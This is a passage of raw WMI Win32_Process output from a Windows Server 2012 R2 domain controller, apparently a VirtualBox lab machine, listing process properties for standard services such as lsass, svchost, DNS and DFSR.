OtherTransferCount : 144580 PageFaults : 9367 PageFileUsage : 1200 ParentProcessId : 336 PeakPageFileUsage : 2624 PeakVirtualSize : 59760640 PeakWorkingSetSize : 8708 Priority : 13 PrivatePageCount : 1228800 ProcessId : 380 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 117 QuotaPeakNonPagedPoolUsage : 14 QuotaPeakPagedPoolUsage : 117 ReadOperationCount : 3 ReadTransferCount : 144816 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 58621952 WindowsVersion : 6.3.9600 WorkingSetSize : 8896512 WriteOperationCount : 1 WriteTransferCount : 160 PSComputerName : WIN-2012-DC ProcessName : winlogon.exe Handles : 156 VM : 58621952 WS : 8896512 Path : C:\Windows\system32\winlogon.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="440" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="440" Caption : services.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121426.721992-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : services.exe ExecutablePath : ExecutionState : Handle : 440 HandleCount : 227 InstallDate : KernelModeTime : 2187500 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : services.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2885 OtherTransferCount : 64186 PageFaults : 4054 PageFileUsage : 2156 ParentProcessId : 352 PeakPageFileUsage : 2920 PeakVirtualSize : 29523968 PeakWorkingSetSize : 5740 Priority : 9 PrivatePageCount : 2207744 ProcessId : 440 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 91 QuotaPeakNonPagedPoolUsage : 17 QuotaPeakPagedPoolUsage : 92 ReadOperationCount : 6 ReadTransferCount : 243828 SessionId : 0 Status : TerminationDate : ThreadCount : 4 UserModeTime : 2343750 VirtualSize : 21508096 WindowsVersion : 6.3.9600 WorkingSetSize : 2891776 WriteOperationCount : 1 WriteTransferCount : 160 PSComputerName : WIN-2012-DC ProcessName : services.exe Handles : 227 VM : 21508096 WS : 2891776 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="448" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="448" Caption : lsass.exe CommandLine : C:\Windows\system32\lsass.exe CreationClassName : Win32_Process CreationDate : 20170712121426.768868-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : lsass.exe ExecutablePath : C:\Windows\system32\lsass.exe ExecutionState : Handle : 448 HandleCount : 1276 InstallDate : KernelModeTime : 59062500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : lsass.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 42608 OtherTransferCount : 4026319 PageFaults : 38862 PageFileUsage : 37588 ParentProcessId : 352 PeakPageFileUsage : 64580 PeakVirtualSize : 1225867264 PeakWorkingSetSize : 66640 Priority : 9 PrivatePageCount : 38490112 ProcessId : 448 QuotaNonPagedPoolUsage : 123 QuotaPagedPoolUsage : 181 QuotaPeakNonPagedPoolUsage : 148 QuotaPeakPagedPoolUsage : 187 ReadOperationCount : 7663 ReadTransferCount : 73721023 SessionId : 0 Status : TerminationDate : ThreadCount : 27 UserModeTime : 37656250 VirtualSize : 1202966528 WindowsVersion : 6.3.9600 WorkingSetSize : 27443200 WriteOperationCount : 1182 WriteTransferCount : 1727779 PSComputerName : WIN-2012-DC ProcessName : lsass.exe Handles : 1276 VM : 1202966528 WS : 27443200 Path : C:\Windows\system32\lsass.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="572" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="572" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k DcomLaunch CreationClassName : Win32_Process CreationDate : 20170712121428.268496-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 572 HandleCount : 367 InstallDate : KernelModeTime : 1562500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 532 OtherTransferCount : 22332 PageFaults : 5374 PageFileUsage : 3224 ParentProcessId : 440 PeakPageFileUsage : 8228 PeakVirtualSize : 50991104 PeakWorkingSetSize : 12264 Priority : 8 PrivatePageCount : 3301376 ProcessId : 572 QuotaNonPagedPoolUsage : 15 QuotaPagedPoolUsage : 173 QuotaPeakNonPagedPoolUsage : 20 QuotaPeakPagedPoolUsage : 174 ReadOperationCount : 2 ReadTransferCount : 4608 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 1250000 VirtualSize : 47263744 WindowsVersion : 6.3.9600 WorkingSetSize : 6938624 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 367 VM : 47263744 WS : 6938624 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="600" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="600" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k RPCSS CreationClassName : Win32_Process CreationDate : 20170712121428.502822-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 600 HandleCount : 356 InstallDate : KernelModeTime : 6093750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1409 OtherTransferCount : 68138 PageFaults : 4600 PageFileUsage : 3216 ParentProcessId : 440 PeakPageFileUsage : 4380 PeakVirtualSize : 32124928 PeakWorkingSetSize : 7540 Priority : 8 PrivatePageCount : 3293184 ProcessId : 600 QuotaNonPagedPoolUsage : 19 QuotaPagedPoolUsage : 69 QuotaPeakNonPagedPoolUsage : 26 QuotaPeakPagedPoolUsage : 71 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 10312500 VirtualSize : 28418048 WindowsVersion : 6.3.9600 WorkingSetSize : 3805184 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 356 VM : 28418048 WS : 3805184 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="716" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="716" Caption : dwm.exe CommandLine : "dwm.exe" CreationClassName : Win32_Process CreationDate : 20170712121428.721530-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dwm.exe ExecutablePath : C:\Windows\system32\dwm.exe ExecutionState : Handle : 716 HandleCount : 174 InstallDate : KernelModeTime : 6562500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dwm.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 270 OtherTransferCount : 1874 PageFaults : 134538 PageFileUsage : 25236 ParentProcessId : 380 PeakPageFileUsage : 27916 PeakVirtualSize : 151556096 PeakWorkingSetSize : 64424 Priority : 13 PrivatePageCount : 25841664 ProcessId : 716 QuotaNonPagedPoolUsage : 18 QuotaPagedPoolUsage : 249 QuotaPeakNonPagedPoolUsage : 20 QuotaPeakPagedPoolUsage : 285 ReadOperationCount : 1 ReadTransferCount : 60 SessionId : 1 Status : TerminationDate : ThreadCount : 7 UserModeTime : 6250000 VirtualSize : 135200768 WindowsVersion : 6.3.9600 WorkingSetSize : 48685056 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : dwm.exe Handles : 174 VM : 135200768 WS : 48685056 Path : C:\Windows\system32\dwm.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="744" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="744" Caption : VBoxService.exe CommandLine : C:\Windows\System32\VBoxService.exe CreationClassName : Win32_Process CreationDate : 20170712121428.800220-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : VBoxService.exe ExecutablePath : C:\Windows\System32\VBoxService.exe ExecutionState : Handle : 744 HandleCount : 138 InstallDate : KernelModeTime : 3437500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : VBoxService.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 360692 OtherTransferCount : 9815652 PageFaults : 65824 PageFileUsage : 1880 ParentProcessId : 440 PeakPageFileUsage : 1972 PeakVirtualSize : 60723200 PeakWorkingSetSize : 4924 Priority : 8 PrivatePageCount : 1925120 ProcessId : 744 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 98 QuotaPeakNonPagedPoolUsage : 11 QuotaPeakPagedPoolUsage : 99 ReadOperationCount : 1339 ReadTransferCount : 5356 SessionId : 0 Status : TerminationDate : ThreadCount : 10 UserModeTime : 156250 VirtualSize : 59535360 WindowsVersion : 6.3.9600 WorkingSetSize : 2777088 WriteOperationCount : 1339 WriteTransferCount : 21424 PSComputerName : WIN-2012-DC ProcessName : VBoxService.exe Handles : 138 VM : 59535360 WS : 2777088 Path : C:\Windows\System32\VBoxService.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="828" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="828" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712121428.974985-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 828 HandleCount : 470 InstallDate : KernelModeTime : 2343750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 9748 OtherTransferCount : 195486 PageFaults : 14264 PageFileUsage : 11492 ParentProcessId : 440 PeakPageFileUsage : 12628 PeakVirtualSize : 417185792 PeakWorkingSetSize : 18704 Priority : 8 PrivatePageCount : 11767808 ProcessId : 828 QuotaNonPagedPoolUsage : 21 QuotaPagedPoolUsage : 100 QuotaPeakNonPagedPoolUsage : 90 QuotaPeakPagedPoolUsage : 775 ReadOperationCount : 571 ReadTransferCount : 18125696 SessionId : 0 Status : TerminationDate : ThreadCount : 14 UserModeTime : 3750000 VirtualSize : 62521344 WindowsVersion : 6.3.9600 WorkingSetSize : 10477568 WriteOperationCount : 1612 WriteTransferCount : 21053256 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 470 VM : 62521344 WS : 10477568 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="868" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="868" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k netsvcs CreationClassName : Win32_Process CreationDate : 20170712121429.077424-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 868 HandleCount : 1485 InstallDate : KernelModeTime : 1415468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 16223299 OtherTransferCount : 4483312296 PageFaults : 7083952 PageFileUsage : 38180 ParentProcessId : 440 PeakPageFileUsage : 529172 PeakVirtualSize : 1013297152 PeakWorkingSetSize : 503340 Priority : 8 PrivatePageCount : 39096320 ProcessId : 868 QuotaNonPagedPoolUsage : 55 QuotaPagedPoolUsage : 308 QuotaPeakNonPagedPoolUsage : 1411 QuotaPeakPagedPoolUsage : 545 ReadOperationCount : 635856 ReadTransferCount : 4894533179 SessionId : 0 Status : TerminationDate : ThreadCount : 37 UserModeTime : 2435000000 VirtualSize : 701550592 WindowsVersion : 6.3.9600 WorkingSetSize : 39227392 WriteOperationCount : 66889 WriteTransferCount : 6173042829 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 1485 VM : 701550592 WS : 39227392 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="916" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="916" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalService CreationClassName : Win32_Process CreationDate : 20170712121429.146469-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 916 HandleCount : 437 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 6327 OtherTransferCount : 354042 PageFaults : 4821 PageFileUsage : 4896 ParentProcessId : 440 PeakPageFileUsage : 5260 PeakVirtualSize : 85487616 PeakWorkingSetSize : 10468 Priority : 8 PrivatePageCount : 5013504 ProcessId : 916 QuotaNonPagedPoolUsage : 25 QuotaPagedPoolUsage : 171 QuotaPeakNonPagedPoolUsage : 31 QuotaPeakPagedPoolUsage : 178 ReadOperationCount : 57 ReadTransferCount : 7766 SessionId : 0 Status : TerminationDate : ThreadCount : 16 UserModeTime : 1718750 VirtualSize : 81354752 WindowsVersion : 6.3.9600 WorkingSetSize : 6328320 WriteOperationCount : 12 WriteTransferCount : 996 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 437 VM : 81354752 WS : 6328320 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="976" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="976" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k NetworkService CreationClassName : Win32_Process CreationDate : 20170712121429.232454-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 976 HandleCount : 752 InstallDate : KernelModeTime : 27031250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 95839 OtherTransferCount : 6023602 PageFaults : 68229 PageFileUsage : 10644 ParentProcessId : 440 PeakPageFileUsage : 28680 PeakVirtualSize : 1432371200 PeakWorkingSetSize : 37824 Priority : 8 PrivatePageCount : 10899456 ProcessId : 976 QuotaNonPagedPoolUsage : 60 QuotaPagedPoolUsage : 199 QuotaPeakNonPagedPoolUsage : 635 QuotaPeakPagedPoolUsage : 681 ReadOperationCount : 2841 ReadTransferCount : 24656487 SessionId : 0 Status : TerminationDate : ThreadCount : 18 UserModeTime : 20781250 VirtualSize : 1193250816 WindowsVersion : 6.3.9600 WorkingSetSize : 10711040 WriteOperationCount : 47699 WriteTransferCount : 240781127 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 752 VM : 1193250816 WS : 10711040 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="432" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="432" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork CreationClassName : Win32_Process CreationDate : 20170712121429.404423-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 432 HandleCount : 372 InstallDate : KernelModeTime : 312500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3442 OtherTransferCount : 148426 PageFaults : 8106 PageFileUsage : 6340 ParentProcessId : 440 PeakPageFileUsage : 6732 PeakVirtualSize : 51179520 PeakWorkingSetSize : 10496 Priority : 8 PrivatePageCount : 6492160 ProcessId : 432 QuotaNonPagedPoolUsage : 33 QuotaPagedPoolUsage : 87 QuotaPeakNonPagedPoolUsage : 36 QuotaPeakPagedPoolUsage : 89 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 18 UserModeTime : 1718750 VirtualSize : 50114560 WindowsVersion : 6.3.9600 WorkingSetSize : 4313088 WriteOperationCount : 1 WriteTransferCount : 32768 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 372 VM : 50114560 WS : 4313088 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1416" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1416" Caption : spoolsv.exe CommandLine : C:\Windows\System32\spoolsv.exe CreationClassName : Win32_Process CreationDate : 20170712121450.375156-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : spoolsv.exe ExecutablePath : C:\Windows\System32\spoolsv.exe ExecutionState : Handle : 1416 HandleCount : 372 InstallDate : KernelModeTime : 468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : spoolsv.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 856 OtherTransferCount : 33608 PageFaults : 3104 PageFileUsage : 3036 ParentProcessId : 440 PeakPageFileUsage : 3424 PeakVirtualSize : 74260480 PeakWorkingSetSize : 8664 Priority : 8 PrivatePageCount : 3108864 ProcessId : 1416 QuotaNonPagedPoolUsage : 20 QuotaPagedPoolUsage : 153 QuotaPeakNonPagedPoolUsage : 24 QuotaPeakPagedPoolUsage : 158 ReadOperationCount : 3 ReadTransferCount : 1464 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 468750 VirtualSize : 72437760 WindowsVersion : 6.3.9600 WorkingSetSize : 2629632 WriteOperationCount : 2 WriteTransferCount : 320 PSComputerName : WIN-2012-DC ProcessName : spoolsv.exe Handles : 372 VM : 72437760 WS : 2629632 Path : C:\Windows\System32\spoolsv.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1368" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1368" Caption : Microsoft.ActiveDirectory.WebServices.exe CommandLine : C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe CreationClassName : Win32_Process CreationDate : 20170712121450.413055-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : Microsoft.ActiveDirectory.WebServices.exe ExecutablePath : C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe ExecutionState : Handle : 1368 HandleCount : 347 InstallDate : KernelModeTime : 1718750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : Microsoft.ActiveDirectory.WebServices.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 15655 OtherTransferCount : 520054 PageFaults : 33220 PageFileUsage : 30536 ParentProcessId : 440 PeakPageFileUsage : 33404 PeakVirtualSize : 595652608 PeakWorkingSetSize : 40372 Priority : 8 PrivatePageCount : 31268864 ProcessId : 1368 QuotaNonPagedPoolUsage : 38 QuotaPagedPoolUsage : 350 QuotaPeakNonPagedPoolUsage : 45 QuotaPeakPagedPoolUsage : 351 ReadOperationCount : 145 ReadTransferCount : 429485 SessionId : 0 Status : TerminationDate : ThreadCount : 10 UserModeTime : 4218750 VirtualSize : 592752640 WindowsVersion : 6.3.9600 WorkingSetSize : 7741440 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : Microsoft.ActiveDirectory.WebServices.exe Handles : 347 VM : 592752640 WS : 7741440 Path : C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1408" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1408" Caption : dfsrs.exe CommandLine : C:\Windows\system32\DFSRs.exe CreationClassName : Win32_Process CreationDate : 20170712121450.696161-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dfsrs.exe ExecutablePath : C:\Windows\system32\DFSRs.exe ExecutionState : Handle : 1408 HandleCount : 335 InstallDate : KernelModeTime : 80781250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dfsrs.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1123795 OtherTransferCount : 204591110 PageFaults : 22967 PageFileUsage : 14024 ParentProcessId : 440 PeakPageFileUsage : 16580 PeakVirtualSize : 634163200 PeakWorkingSetSize : 20244 Priority : 8 PrivatePageCount : 14360576 ProcessId : 1408 QuotaNonPagedPoolUsage : 32 QuotaPagedPoolUsage : 125 QuotaPeakNonPagedPoolUsage : 35 QuotaPeakPagedPoolUsage : 125 ReadOperationCount : 1814 ReadTransferCount : 11538526 SessionId : 0 Status : TerminationDate : ThreadCount : 15 UserModeTime : 166406250 VirtualSize : 632041472 WindowsVersion : 6.3.9600 WorkingSetSize : 8839168 WriteOperationCount : 5850 WriteTransferCount : 96397765 PSComputerName : WIN-2012-DC ProcessName : dfsrs.exe Handles : 335 VM : 632041472 WS : 8839168 Path : C:\Windows\system32\DFSRs.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1508" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1508" Caption : dns.exe CommandLine : C:\Windows\system32\dns.exe CreationClassName : Win32_Process CreationDate : 20170712121450.752362-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dns.exe ExecutablePath : C:\Windows\system32\dns.exe ExecutionState : Handle : 1508 HandleCount : 10284 InstallDate : KernelModeTime : 5156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dns.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 49639 OtherTransferCount : 1110789 PageFaults : 28714 PageFileUsage : 88328 ParentProcessId : 440 PeakPageFileUsage : 89316 PeakVirtualSize : 147890176 PeakWorkingSetSize : 87164 Priority : 8 PrivatePageCount : 90447872 ProcessId : 1508 QuotaNonPagedPoolUsage : 10076 QuotaPagedPoolUsage : 1262 QuotaPeakNonPagedPoolUsage : 10295 QuotaPeakPagedPoolUsage : 1264 ReadOperationCount : 57 ReadTransferCount : 6612 SessionId : 0 Status : TerminationDate : ThreadCount : 12 UserModeTime : 2343750 VirtualSize : 145772544 WindowsVersion : 6.3.9600 WorkingSetSize : 6610944 WriteOperationCount : 60 WriteTransferCount : 9120 PSComputerName : WIN-2012-DC ProcessName : dns.exe Handles : 10284 VM : 145772544 WS : 6610944 Path : C:\Windows\system32\dns.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1548" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1548" Caption : ismserv.exe CommandLine : C:\Windows\System32\ismserv.exe CreationClassName : Win32_Process CreationDate : 20170712121450.809793-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : ismserv.exe ExecutablePath : C:\Windows\System32\ismserv.exe ExecutionState : Handle : 1548 HandleCount : 88 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : ismserv.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 337 OtherTransferCount : 6006 PageFaults : 1422 PageFileUsage : 1380 ParentProcessId : 440 PeakPageFileUsage : 1640 PeakVirtualSize : 29483008 PeakWorkingSetSize : 4108 Priority : 8 PrivatePageCount : 1413120 ProcessId : 1548 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 39 QuotaPeakNonPagedPoolUsage : 12 QuotaPeakPagedPoolUsage : 39 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 6 UserModeTime : 0 VirtualSize : 26324992 WindowsVersion : 6.3.9600 WorkingSetSize : 839680 WriteOperationCount : 0 WriteTransferCount : 0 